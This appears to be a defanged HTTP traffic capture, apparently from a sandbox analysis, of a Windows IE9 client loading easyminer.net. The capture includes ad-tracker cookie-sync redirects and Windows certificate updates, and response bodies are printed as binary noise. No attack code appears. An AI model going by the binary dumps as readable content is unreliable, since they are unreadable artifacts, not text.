....05.....C...3.....9<88...s0}../h...G......5..1Y./!...D.....c.5Y1
.5M..AO...._..].....4.%..I-V...1.....yX....A...."....H.s2....H"F..C..j
....6.V.Wy.. .._.....x..a...>.........Qo..........O9..Q.F....g.K.?.
........5..._........{.J. .k@~|....,Xv..Y.pu.gy<q.5&.....d_.2.0..|.
.O.F....0.._..<...l.......sCPK.EV&....%d.,]>q..b..Q..W-\...`..'.
:YL2G..,X..,.l........@.I4E.T.....X.a\...8....".[P...}Gb8.2X.vP..`...s
..s.Y.OEK... .'nvn.F.\]z./.U.v=.c...8.N"...W7'.$..[..v.......O.A.x.?Qb
5..1.y.'.Sz..8<X.I...4..R..AQ..V...I....a5'..?..].....v.)m.!.q h~j\
........>.gQ=1.A.....n.....N1..q..^...(.|.[.,`.......)K.^.5..K..?(.
...-....q^*...IQ..>...../f......Z5Z........2..".5...Q...N_.fW..AJ8.
.b....~.H.\]..a....ly..?.L..z........Y!hL..j.4l..4......S.X..#..60....
..e..5(...ce..M.c m ..-..lj)..l...E..l......4B...0[.=.t.e.....E%.q<<< skipped >>>

GET /tmp/cache/intelli.lang.en.js?fm=1499849052 HTTP/1.1

Accept: application/javascript, */*;q=0.8

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: easyminer.net

Connection: Keep-Alive

Cookie: INTELLI_90833303d1=9dd599517f1317a5a76366f195a0443d


HTTP/1.1 200 OK

Cache-Control: public, max-age=31536000,public, must-revalidate, proxy-revalidate

Expires: Sat, 21 Jul 2018 15:05:39 GMT

Last-Modified: Wed, 12 Jul 2017 08:44:12 GMT

Content-Type: application/x-javascript

Content-Length: 14622

Content-Encoding: gzip

Vary: Accept-Encoding

Date: Fri, 21 Jul 2017 15:05:39 GMT

Accept-Ranges: bytes

Server: LiteSpeed

Pragma: public

X-Powered-By: W3 Total Cache/0.9.3

Connection: Keep-Alive
.............w.G...J.9..ul..y@........b......ZR[. .5...' .......~.aL..
.E...].....U.O..x.....(.2.a.7-......4....l=(f..L^,.....<*.lk{.We.l0
W..N./.................~.....$-..F.t1? ....a2/.t0..*...U2KG....I.}..f.
.....u..<.'.|t6O.......H..I1../>>. .35.*.......o...._......gO
....b:T...<..Y.....P.....)...$..........t....N.....?.*#y.W.N.io.N..
..-9.7...._.'.t... ez.W..<......^..R >..#..@%.A6.......)..Hy...R
)..../..J=.....).lo....:...bJo1....7(..y9I.y1U. ..HS-..y:.k....2/.w.}.
..R.=H.#-....Ox.).bU.......0.!E0EQe..|...t.xJ....._e2(&..< ...|n-..
.q>x...7....R.Ybb/...........G..ZCczf..U...O..='z&.......).......8.
U.....&=V...}...Llr....m..Px..y....B.Az......~......'..e.M....c.p..%.U
...K....D...5L/Dw..)O.......N.....N[IZ.'g......Ge^....c(]Y.|..Vyh.....
.^.{YY.@...Sf..4.CH...CL.V>.$#7....C~....2.......JN..Xc.0<)m..c.
......J.cC....R..-........C...|.....#.ezjm.....-.*b.CR.|..T..I."...Umk
..<..Wj?....l......[.?.l.)-...3 .<..e...O....'.^{........-....2.
..d6....5..|..M.U..d$.w......M.p.-..IdK..v..4.80...E...%..R.c.2.F....L
.<5.........4...!.....u.Q...j.H...l.....:.A.l...%G.L..O.l0.a~z....Z
].lN.(|$}..^>..,..M..&M.....U.1...rC|..8.4.T0..N....h....R.g*.(|2,.
@....J.....9R....Of.....vg*Nd=..f .sW.oQ..%r,.!.5BB....#Kqn....O...4..
.?.1y.g.a.0S..G..T......|.[..?.R.......W..w.O....q(...z......!9K .....
.K.*^c_....s.k.J.U...R..A~......U..H..{0.b<.g.m......=.pRc<[..K8
.W.t..f....X..?.%9.KR..!..o...gA...J:BF.1.Y.Z.....H.....U.M.}.J.B..y..
h....?!.N. .. .......Lk.~....C.....z"...z.....}HALN..._Y2fvW.:M.Y.<<< skipped >>>

GET /templates/kickstart/img/icon-browser.png HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: easyminer.net

Connection: Keep-Alive

Cookie: INTELLI_90833303d1=9dd599517f1317a5a76366f195a0443d


HTTP/1.1 200 OK

Cache-Control: public, max-age=31536000,public, must-revalidate, proxy-revalidate

Expires: Sat, 21 Jul 2018 15:05:40 GMT

Last-Modified: Mon, 17 Apr 2017 21:12:51 GMT

Content-Type: image/png

Content-Length: 11678

Date: Fri, 21 Jul 2017 15:05:40 GMT

Accept-Ranges: bytes

Server: LiteSpeed

Pragma: public

X-Powered-By: W3 Total Cache/0.9.3

Connection: Keep-Alive
.PNG........IHDR..............X....-eIDATx....w.W..e..........w0`l.sF.
@B.h.m............z.zl.....NZ.$....:Tu..U.....J4M.T.R ^...5..]....p...
..y....... $$........@... BB..!!.....DHH."$$.........@... BB..!!.....D
HH."$$........@.. $4..<%$4.40@..O...._AO...........3.}..4......).$.
0..%....F.h,...2... ..:.).\....m.16..k7.5)?V.F...E....v.X.1Mc..8.u....
. O@..@DO.K]..f.C9^] s..E..z!..#..4..1..Nc..~&....w....n>..A....ax!
3C....R....Nc..>1..D&...|('q0..........1..4...b.... .H..n>..t.C.
...>O&..X,C.<..x.`B.*>...`>..!....mAL...oV?....He?.N.....U
~...........k.U..Rn.....Wl...OHhH."...b.$ ...V....u0.....5.j......5fU.
....p.....>f...Rk........!(...J....A..>....B.n.....5.o...A.2<
z......z~.:.s..L5......s\.~...1..k8...{^....D.......QR...t.......0.?.N
..=.'..Q.W....uG.(.. ..A^.pOV.....=.X.!...[..^Kf..]X...........k.[.V?h
.k.f}(J....8x.>Tc.....j[OT.d...m(M........iP...........8.q.G...8z._
0.T.>w.c....Z...a....X?p..ZT.....^C..@.J".<............k[..y.."&
.......;{...8A.....|..$_....../[....Z._. ...c5.:..P.Y-...R.yK9..[.%...
..-..Z.......hy..m...k.......6....X./..8...w.................7i`....k.
9....r|....._.s.H._.L.z..P.....?l.!.y.".p\..w.H..VC........s........Z.
s[.......d.1....~.A(...S...9 ...........R...*.jO >.."..p....a......
..[*x.y...K....K.......n.(~..s^..).j....C-.$.k|.........U ..c:..y..../
.......~8.K.|..O........V5....x...../,..... &..J..w.tx........>....
.G.s'=.z..(y...i.i.....4.rK....|M.-.v=. ..v..Q..'.....F..@.j...JG..H].
/.-.......{......~..S[t.....kt....i.....X.W#F_ \-....M....x.......<<< skipped >>>

GET /uploads/site_favicon.ico HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Host: easyminer.net

Connection: Keep-Alive

Cookie: INTELLI_90833303d1=9dd599517f1317a5a76366f195a0443d; HstCfa3635752=1500649540706; HstCla3635752=1500649540706; HstCmu3635752=1500649540706; HstPn3635752=1; HstPt3635752=1; HstCnv3635752=1; HstCns3635752=1; __dtsu=2DE7B66B4518725926432CB1022296DF


HTTP/1.1 200 OK

Cache-Control: public, max-age=31536000,public, must-revalidate, proxy-revalidate

Expires: Sat, 21 Jul 2018 15:05:42 GMT

Last-Modified: Wed, 19 Apr 2017 04:23:10 GMT

Content-Type: image/x-icon

Content-Length: 109638

Date: Fri, 21 Jul 2017 15:05:42 GMT

Accept-Ranges: bytes

Server: LiteSpeed

Pragma: public

X-Powered-By: W3 Total Cache/0.9.3

Connection: Keep-Alive
..............(L......00...........L..  ..........V[..........h....c..
...... .(...fi..00.... ..%...q..  .... .....6......... .h.......(.....
...............@......................$k,.%n-.&p..'r0.'t0.(r0.(u1.-u5.
)x2.*{4.*}4.,.5.2x:.4y<.:}A.,.6.-.7...8...8...9.2.<.0.:.0.:.2.&l
t;.5.?.1.<.4.>.1.=.4.?.3.>.4.?.7.@.>.E.7.@.9.B.9.C.;.D.;.D
.<.E.?.H.5.@.5.@.9.D.4.@.6.B.8.C.:.E.:.E.<.G.>.H.>.I.7.C.7
.D.9.D.8.E.:.F.=.I.=.I.;.H.=.J.;.H.<.I.=.J.>.L.@.G.C.J.D.K.E.L.@
.H.B.K.D.M.@.I.F.O.E.N.@.I.C.M.C.M.K.R.L.R.N.U.Q.W.R.X.F.P.I.R.M.U.G.P
.H.R.I.R.K.T.L.U.K.T.M.V.N.X.U.\.Q.Y.@.M.A.N.A.N.O.X.Q.Z.Q.[.S.\.U.^.C
.P.D.P.B.P.D.Q.G.T.H.U.E.R.G.T.F.T.H.U.I.V.J.X.L.Y.Z.`.\.b.^.d.`.f.b.h
.c.i.e.k.f.l.i.n.j.p.W.`.Y.a.Y.b.\.d.[.d.].e.].e.S.`.`.h.a.j.a.i.d.l.f
.n.c.m.m.s.m.t.r.w.p.w.t.y.x.}.u.{.x.}.g.p.h.q.l.t.l.u.t.{.u.}.N.[.P.]
.|...}...|...|........................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
..................................................................<<< skipped >>>

GET /m/id.gif?uim_s=DTS&uim_k=71129f02efc51faa&uim_id=2DE7B66B4518725926432CB1022296DF HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: get35.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: Apache-Coyote/1.1

Set-Cookie: uim_guid=guid_d_317a6fc909106385ec6c1c8bbba66a7853d887858fda02b4c66656311624ed2ccb16c357d13dbcbc; Expires=Sat, 21-Jul-2018 15:06:26 GMT; Path=/

Last-Modified: Fri, 21 Jul 2017 15:06:26 GMT

ETag: W/"08aa22b4fa19188430d4f71b3ab66a96e2c4f809c9c87884425547df588e3cdb"

Cache-Control: no-cache, no-store, no-transform, must-revalidate

Content-Type: image/gif;charset=UTF-8

Content-Length: 49

Date: Fri, 21 Jul 2017 15:06:25 GMT

Connection: close

GIF89a...................!.......,...........T..;..

GET /idsync/ex/receive?partner_id=2376&partner_device_id=2y2HLmim-lDxCbqd_woBThAq2fJ2pZ410Tu8MtlixxQ8&partner_url=http://ps.eyeota.net/match?uid=${TA_DEVICE_ID}&bid=6bnoi0v HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: pixel.tapad.com

Connection: Keep-Alive


HTTP/1.1 302 Found

Server: nginx/1.11.3

Date: Fri, 21 Jul 2017 15:05:52 GMT

Content-Length: 0

Connection: keep-alive

P3P: policyref="hXXp://tapad-taptags.s3.amazonaws.com/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"

Set-Cookie: TapAd_TS=1500649552454;Expires=Tue, 19 Sep 2017 15:05:52 GMT;Path=/;Domain=.tapad.com

Set-Cookie: TapAd_DID=16918e61-6e26-11e7-8451-005056a24356;Expires=Tue, 19 Sep 2017 15:05:52 GMT;Path=/;Domain=.tapad.com

Location: hXXp://pixel.tapad.com/idsync/ex/receive/check?partner_id=2376&partner_device_id=2y2HLmim-lDxCbqd_woBThAq2fJ2pZ410Tu8MtlixxQ8&partner_url=http://ps.eyeota.net/match?uid=${TA_DEVICE_ID}&bid=6bnoi0v
HTTP/1.1 302 Found..Server: nginx/1.11.3..Date: Fri, 21 Jul 2017 15:05
:52 GMT..Content-Length: 0..Connection: keep-alive..P3P: policyref="ht
tp://tapad-taptags.s3.amazonaws.com/policy/p3p.xml", CP="NOI DSP COR A
DM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"..Set-Cookie:
 TapAd_TS=1500649552454;Expires=Tue, 19 Sep 2017 15:05:52 GMT;Path=/;D
omain=.tapad.com..Set-Cookie: TapAd_DID=16918e61-6e26-11e7-8451-005056
a24356;Expires=Tue, 19 Sep 2017 15:05:52 GMT;Path=/;Domain=.tapad.com.
.Location: hXXp://pixel.tapad.com/idsync/ex/receive/check?partner_id=2
376&partner_device_id=2y2HLmim-lDxCbqd_woBThAq2fJ2pZ410Tu8MtlixxQ8&par
tner_url=http://ps.eyeota.net/match?uid=${TA_DEVICE_ID
}&bid=6bnoi0v......


GET /idsync/ex/receive?partner_id=1830&partner_device_id=d0758d3b-c6d8-453b-b2ec-324c93cd1abd&ttd_puid=,http://ps.eyeota.net/match?uid=16918e61-6e26-11e7-8451-005056a24356&bid=6bnoi0v HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Cookie: TapAd_TS=1500649552454; TapAd_DID=16918e61-6e26-11e7-8451-005056a24356

Connection: Keep-Alive

Host: pixel.tapad.com


HTTP/1.1 302 Found

Server: nginx/1.11.3

Date: Fri, 21 Jul 2017 15:05:52 GMT

Transfer-Encoding: chunked

Connection: keep-alive

P3P: policyref="hXXp://tapad-taptags.s3.amazonaws.com/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"

Set-Cookie: TapAd_TTD_SYNC=4863;Expires=Tue, 19 Sep 2017 15:05:52 GMT;Path=/;Domain=.tapad.com

Set-Cookie: TapAd_TS=1500649552454;Expires=Tue, 19 Sep 2017 15:05:52 GMT;Path=/;Domain=.tapad.com

Set-Cookie: TapAd_DID=16918e61-6e26-11e7-8451-005056a24356;Expires=Tue, 19 Sep 2017 15:05:52 GMT;Path=/;Domain=.tapad.com

Location: hXXp://ps.eyeota.net/match?uid=16918e61-6e26-11e7-8451-005056a24356&bid=6bnoi0v
0..HTTP/1.1 302 Found..Server: nginx/1.11.3..Date: Fri, 21 Jul 2017 15
:05:52 GMT..Transfer-Encoding: chunked..Connection: keep-alive..P3P: p
olicyref="hXXp://tapad-taptags.s3.amazonaws.com/policy/p3p.xml", CP="N
OI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE".
.Set-Cookie: TapAd_TTD_SYNC=4863;Expires=Tue, 19 Sep 2017 15:05:52 GMT
;Path=/;Domain=.tapad.com..Set-Cookie: TapAd_TS=1500649552454;Expires=
Tue, 19 Sep 2017 15:05:52 GMT;Path=/;Domain=.tapad.com..Set-Cookie: Ta
pAd_DID=16918e61-6e26-11e7-8451-005056a24356;Expires=Tue, 19 Sep 2017 
15:05:52 GMT;Path=/;Domain=.tapad.com..Location: hXXp://ps.eyeota.net/
match?uid=16918e61-6e26-11e7-8451-005056a24356&bid=6bnoi0v..0..

GET /msdownload/update/v3/static/trustedr/en/authrootstl.cab HTTP/1.1

Cache-Control: max-age = 86402

Connection: Keep-Alive

Accept: */*

If-Modified-Since: Fri, 16 Sep 2016 21:16:59 GMT

If-None-Match: "8017f9a85f10d21:0"

User-Agent: Microsoft-CryptoAPI/6.1

Host: VVV.download.windowsupdate.com


HTTP/1.1 200 OK

Cache-Control: max-age=604800

Content-Type: application/vnd.ms-cab-compressed

Last-Modified: Tue, 13 Jun 2017 19:04:53 GMT

Accept-Ranges: bytes

ETag: "80f83df077e4d21:0"

Server: Microsoft-IIS/8.5

X-Powered-By: ASP.NET

Content-Length: 52967

Date: Fri, 21 Jul 2017 15:05:48 GMT

Connection: keep-alive

X-CCC: UA

X-CID: 2
MSCF............,...................I..................J.` .authroot.s
tl.^R.Y.6..CK...8...........].y.Q..!Jv..%k.....!..DH...B.KBWE.(.f.RQ*.
..f...}'.....x.:.{f...|.s.q..CF.......0....{%i......P.F.yNz:A..L..1..3
...........IG.....4=....~."|..s.|.xuT..._.*.....e.h,....ozs..*.!TmS..A
q... |,.....V..xV....^....FE(.x...N..h...b....y...j.!....7..h. ..@.(V.
.....8..`-..#=.jq'.e...|..X...@...{..rj.d.....?n3.L.......S.......:.O.
.."k.!o......`.l.B 1.....#].....k6.........B.......!P$.A..<..?zk...
.~..P)A0tu....x..-X..E..,a.7,xN..eed.3..L..XT......IG.w_.Y....E....~k.
.X...T.V.g7d.....#.&~.f.O....Dh...x0..J...0..u.dF..P.!..d...%x<!...
....@,...0..3..-.....q.....X.e....A...z.'..2.<.m.f...I.9.z..a.6vo..
 ...P..U7...-.0.Q..<zd!V....=.'.....2H;..5.7.%5PsD.#.....ht%......f
..s.Dp..Lklx%[.!c...I.<...f.<..e.k`......^.......X..?Z...?......
?..I}..5V.v .q.c.9j..Y..J..0U.t./%..Jd @.W.u......U.".)C(........T.4.y
..J.57*^HlY....O|..~\.J]..]e...?..x2c..6.....i.=?x.....N..-X..f"^@'...
.-v..v...7j.Y1.5._v.....*S9.."........%E<E...;p.}........0..P....g.
.@.]E.3........K....K.4V..Q.-,.../.........:.A....Ng,.........BFef.[..
. ..."*...^...L._#:,7..6:.z..!a............E.r>......A....#..c.....
rS.......7.D..JdR.`6.|...>.0....Wf..n..^..8x.4..........-.3y,3.C.(.
...9f...iNK....q....sUq....c...c.....*K.8"..D...<..0............*x,
$x....a....]..p..t.M....6F..u.....p.r.kf...Z......h~.B3...[.....Hc...K
.....I.....%F..:.....N....U..eU........ e. k....3(S..h....1..r..Z.Y...
.....A.i..Z....[%J.....=2"v].....L.P..!........PC*.........j 8.~.)<<< skipped >>>

GET /msdownload/update/v3/static/trustedr/en/3679CA35668772304D30A5FB873B0FA77BB70D54.crt HTTP/1.1

Connection: Keep-Alive

Accept: */*

User-Agent: Microsoft-CryptoAPI/6.1

Host: VVV.download.windowsupdate.com


HTTP/1.1 200 OK

Content-Type: application/x-x509-ca-cert

Last-Modified: Thu, 23 Jul 2015 23:16:35 GMT

Accept-Ranges: bytes

ETag: "80b4b9e9dc5d01:0"

Server: Microsoft-IIS/8.5

X-Powered-By: ASP.NET

X-Powered-By: ASP.NET

Content-Length: 1213

Date: Fri, 21 Jul 2017 15:06:20 GMT

Connection: keep-alive

X-CCC: UA

X-CID: 2
0...0..........@..d!..!........0...*.H........0..1.0...U....US1.0...U.
...VeriSign, Inc.1.0...U....VeriSign Trust Network1:08..U...1(c) 2008 
VeriSign, Inc. - For authorized use only1806..U.../VeriSign Universal 
Root Certification Authority0...080402000000Z..371201235959Z0..1.0...U
....US1.0...U....VeriSign, Inc.1.0...U....VeriSign Trust Network1:08..
U...1(c) 2008 VeriSign, Inc. - For authorized use only1806..U.../VeriS
ign Universal Root Certification Authority0.."0...*.H.............0...
......a7^..4.b....XZ.##.`......z.X.8....d...q......M...-s..iq..9<.D
.....MJ.!.)a.2"a....n.|_. QD.pOW.....y.X....E..,... {.7zA3x.3......,..
..B....b._.K....uD2A:.qni..uF.... .....@kd.WM...y..^T.4.....%..J...zfk
.`f...........D..j..n3...U....j.._..3..`.['......Vj.%.........0..0...U
.......0....0...U...........0m.. ........a0_.].[0Y0W0U..image/gif0!0.0
... ..............k...j.H.,{..0%.#hXXp://logo.verisign.com/vslogo.gif0
...U.......w.iHG.S.....2v.....0...*.H.............J.....,g{..wc.nL.}..
...5.pOc.$.l..G.;c...v2...w......1!...VZ......Y..c..L.Y.J...(.Z....P8.
l..=..c...!.$9...fF....Ms.}F.=.._b..?..tW .....(....p..............2..
.W.......=...8...\:Oj?..flc...........}..4...ps.{.~..a.E......0.5....U
..K....q........a.8.O..*Z...<<< skipped >>>

GET /sg/eyeota/1/cm HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: trc.taboola.com

Connection: Keep-Alive


HTTP/1.1 302 Found

Server: nginx/1.10.1

Set-Cookie: t_gid=b0a91725-996e-4077-8f53-f9ad0312c26b-tuct6b9dda;Path=/;Domain=.taboola.com;Expires=Sat, 21-Jul-2018 15:06:02 GMT

Expires: Thu, 01 Jan 1970 00:00:00 GMT

Set-Cookie: taboola_usg=IgwKBmV5ZW90YRICCAE;Path=/;Domain=.taboola.com;Expires=Sat, 21-Jul-2018 15:06:02 GMT

Location: hXXp://ps.eyeota.net/match?bid=1mpf4m0&uid=b0a91725-996e-4077-8f53-f9ad0312c26b-tuct6b9dda

Content-Length: 0

Accept-Ranges: bytes

Date: Fri, 21 Jul 2017 15:06:02 GMT

Via: 1.1 varnish

Connection: keep-alive

X-Served-By: cache-hhn1548-HHN

X-Cache: MISS

X-Cache-Hits: 0

X-Timer: S1500649563.518461,VS0,VE8

HTTP/1.1 302 Found..Server: nginx/1.10.1..Set-Cookie: t_gid=b0a91725-9
96e-4077-8f53-f9ad0312c26b-tuct6b9dda;Path=/;Domain=.taboola.com;Expir
es=Sat, 21-Jul-2018 15:06:02 GMT..Expires: Thu, 01 Jan 1970 00:00:00 G
MT..Set-Cookie: taboola_usg=IgwKBmV5ZW90YRICCAE;Path=/;Domain=.taboola
.com;Expires=Sat, 21-Jul-2018 15:06:02 GMT..Location: hXXp://ps.eyeota
.net/match?bid=1mpf4m0&uid=b0a91725-996e-4077-8f53-f9ad0312c26b-tuct6b
9dda..Content-Length: 0..Accept-Ranges: bytes..Date: Fri, 21 Jul 2017 
15:06:02 GMT..Via: 1.1 varnish..Connection: keep-alive..X-Served-By: c
ache-hhn1548-HHN..X-Cache: MISS..X-Cache-Hits: 0..X-Timer: S1500649563
.518461,VS0,VE8..

GET /s/opensans/v14/EInbV5DfGHOiMmvb1Xr-horaN7vELC11_xip9Rz-hMs.woff HTTP/1.1

Accept: */*

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Origin: hXXp://easyminer.net

Accept-Encoding: gzip, deflate

Host: fonts.gstatic.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Accept-Ranges: bytes

Content-Type: font/woff

Access-Control-Allow-Origin: *

Timing-Allow-Origin: *

Content-Length: 25232

Date: Wed, 28 Jun 2017 12:03:48 GMT

Expires: Thu, 28 Jun 2018 12:03:48 GMT

Last-Modified: Wed, 14 Jun 2017 16:46:07 GMT

X-Content-Type-Options: nosniff

Server: sffe

X-XSS-Protection: 1; mode=block

Cache-Control: public, max-age=31536000

Age: 1998112
wOFF......b........@........................GDEF.......(...(....GPOS..
..............GSUB.......X...t.[..OS/2.......[...`..$.cmap...l........
....cvt ...L...g.....o.[fpgm.............s.ugasp...X...........#glyf..
.h..OV..~...t.head..W....6...6....hhea..W.... ...$...{hmtx..X.........
Xzf.loca..[,..........=.maxp..].... ... ....name..]........V..2.post..
^...........Urprep..a........1...S...............................4...6
.F..................x......P...s..I.....P* ..........<p8....|..O..4
..}... z}..[smkg.......{s.S...[..3..3.;..x.c`f.cV``e``..j...(.../2.11s
01qs.1s.01.400.300x3@..c.3........?....^...... 9.\.m@J.........x.}.%X.
a....cqw.E;.k.[.z.A%..^.x............Wf.........d...0.P...c.[P.Au.....
.?Wq57p3....I.$H..K..K..&E$.(.@L].~.c...?..`..n.^..P.../.e.......A..P]
..x7.. @....Y........................#.....t6\.ea..X.*.......lb...M..H
....N..x.c.a.g``..$K..(..`.e.a.a`....C..L..@t..............A..L..&....
..........1\gta.e....320.0...2.g.j...=...x..TGw.F.........)..)7..W..`*
.j.-...=*'_..sI...2...O>....[tt....TK]..|...G.................^.m..
=..x..q... ./].p....'..k...T.......V..v...|nhp.....&....UE...'.V.&...[
.y..AD....D.Z....P.H...L..Z...tRKg....*.J)...]).|zL... ...Z.C2zh...m..
......o.c/t1^R,4es.P...PD.......~.:..q....,W. ......1...m...(....XS...
&...b.JgK".=...&......\.....}.>/.?..18"]8......<....1.zk|#......
....c......#Q..V...D0....M..q.q.K..a.u.tf.0e..J...... ..?\.._.....r...
...=c/ 0..hG....i_............i..McX.:l.....T.l.Za..c..!1.z..)b:=f.=.6
.fB.._....N|)......Z.4a...-...q.D.m.........$...x7......~.[1......<<< skipped >>>

GET /ibs:dpid=30064&dpuuid=15d65aed1dd-30270000010f1a0b&redir=http://ps.eyeota.net/match?bid=6j5b2cv&uid=${DD_UUID} HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: dpm.demdex.net

Connection: Keep-Alive


HTTP/1.1 302 Found

Cache-Control: no-cache,no-store,must-revalidate,max-age=0,proxy-revalidate,no-transform,private

Date: Fri, 21 Jul 2017 15:05:52 GMT

Expires: Thu, 01 Jan 2009 00:00:00 GMT

Location: hXXp://dpm.demdex.net/demconf.jpg?et:ibs|data:dpid=30064&dpuuid=15d65aed1dd-30270000010f1a0b&redir=http://ps.eyeota.net/match?bid=6j5b2cv&uid=${DD_UUID}

P3P: policyref="/w3c/p3p.xml", CP="NOI NID CURa ADMa DEVa PSAa PSDa OUR SAMa BUS PUR COM NAV INT"

Pragma: no-cache

Set-Cookie: demdex=00702949223008346980439587358349708598;Path=/;Domain=.demdex.net;Expires=Wed, 17-Jan-2018 15:05:52 GMT

X-TID: 4ZLIQO8/RsE=

Content-Length: 0

Connection: keep-alive
HTTP/1.1 302 Found..Cache-Control: no-cache,no-store,must-revalidate,m
ax-age=0,proxy-revalidate,no-transform,private..Date: Fri, 21 Jul 2017
 15:05:52 GMT..Expires: Thu, 01 Jan 2009 00:00:00 GMT..Location: http:
//dpm.demdex.net/demconf.jpg?et:ibs|data:dpid=30064&dpuuid=15d65aed1
dd-30270000010f1a0b&redir=http://ps.eyeota.net/match?bid=6
j5b2cv&uid=${DD_UUID}..P3P: policyref="/w3c/p3p.xml", CP="NO
I NID CURa ADMa DEVa PSAa PSDa OUR SAMa BUS PUR COM NAV INT"..Pragma: 
no-cache..Set-Cookie: demdex=00702949223008346980439587358349708598;Pa
th=/;Domain=.demdex.net;Expires=Wed, 17-Jan-2018 15:05:52 GMT..X-TID: 
4ZLIQO8/RsE=..Content-Length: 0..Connection: keep-alive..

GET /eyeota/match?nuid=2OeEhSJbKAKnfeMSs5qpyd25iSorqopqzG8-fwmhBzgQ&rurl=http://ps.eyeota.net/match?bid=r8d1b20 HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: eyeota-sync.dotomi.com

Connection: Keep-Alive


HTTP/1.1 302 Found

Server: nginx

Date: Fri, 21 Jul 2017 15:05:52 GMT

Content-Length: 0

Connection: close

Set-Cookie: dtm_test=27c7cceb86980571; Expires=Fri, 21 Jul 2017 15:06:22 GMT; Domain=.dotomi.com

Cache-Control: max-age=0, no-store

P3P: policyref="/w3c/p3p.xml", CP="NOI DSP NID OUR STP"

Location: /eyeota/match?dtm_test=27c7cceb86980571&nuid=2OeEhSJbKAKnfeMSs5qpyd25iSorqopqzG8-fwmhBzgQ&rurl=http://ps.eyeota.net/match?bid=r8d1b20

GET /getuid?bounce=true&url=http://ps.eyeota.net/match?bid=b2c3gb0&uid={{UUID}}
 HTTP/1.1

Accept: image/png, image/svg xml, image/*;q=0.8, */*;q=0.5

Referer: hXXp://easyminer.net/

Accept-Language: en-US

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)

Accept-Encoding: gzip, deflate

Host: ads.avocet.io

Connection: Keep-Alive

Cookie: uuid=005297fc-ec97-47a0-a704-4984e8b602f2


HTTP/1.1 302 Found

Content-Type: text/html; charset=utf-8

Date: Fri, 21 Jul 2017 15:05:57 GMT

Location: hXXp://ps.eyeota.net/match?bid=b2c3gb0&uid=005297fc-ec97-47a0-a704-4984e8b602f2

P3p: policyref="hXXp://cdn.avocet.io/w3c/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"

Set-Cookie: uuid=005297fc-ec97-47a0-a704-4984e8b602f2; Path=/; Expires=Sat, 21 Jul 2018 15:05:57 GMT; Max-Age=31536000; HttpOnly

Content-Length: 107

Connection: keep-alive
<a href="hXXp://ps.eyeota.net/match?bid=b2c3gb0&uid=005297fc-ec
97-47a0-a704-4984e8b602f2.">Found</a>...HTTP/1.1 302 Found..C
ontent-Type: text/html; charset=utf-8..Date: Fri, 21 Jul 2017 15:05:57
 GMT..Location: hXXp://ps.eyeota.net/match?bid=b2c3gb0&uid=005297fc-ec
97-47a0-a704-4984e8b602f2..P3p: policyref="hXXp://cdn.avocet.io/w3c/p3
p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV 
DEM STA PRE"..Set-Cookie: uuid=005297fc-ec97-47a0-a704-4984e8b602f2; P
ath=/; Expires=Sat, 21 Jul 2018 15:05:57 GMT; Max-Age=31536000; HttpOn
ly..Content-Length: 107..Connection: keep-alive..<a href="hXXp://ps
.eyeota.net/match?bid=b2c3gb0&uid=005297fc-ec97-47a0-a704-4984e8b6
02f2.">Found</a>.....

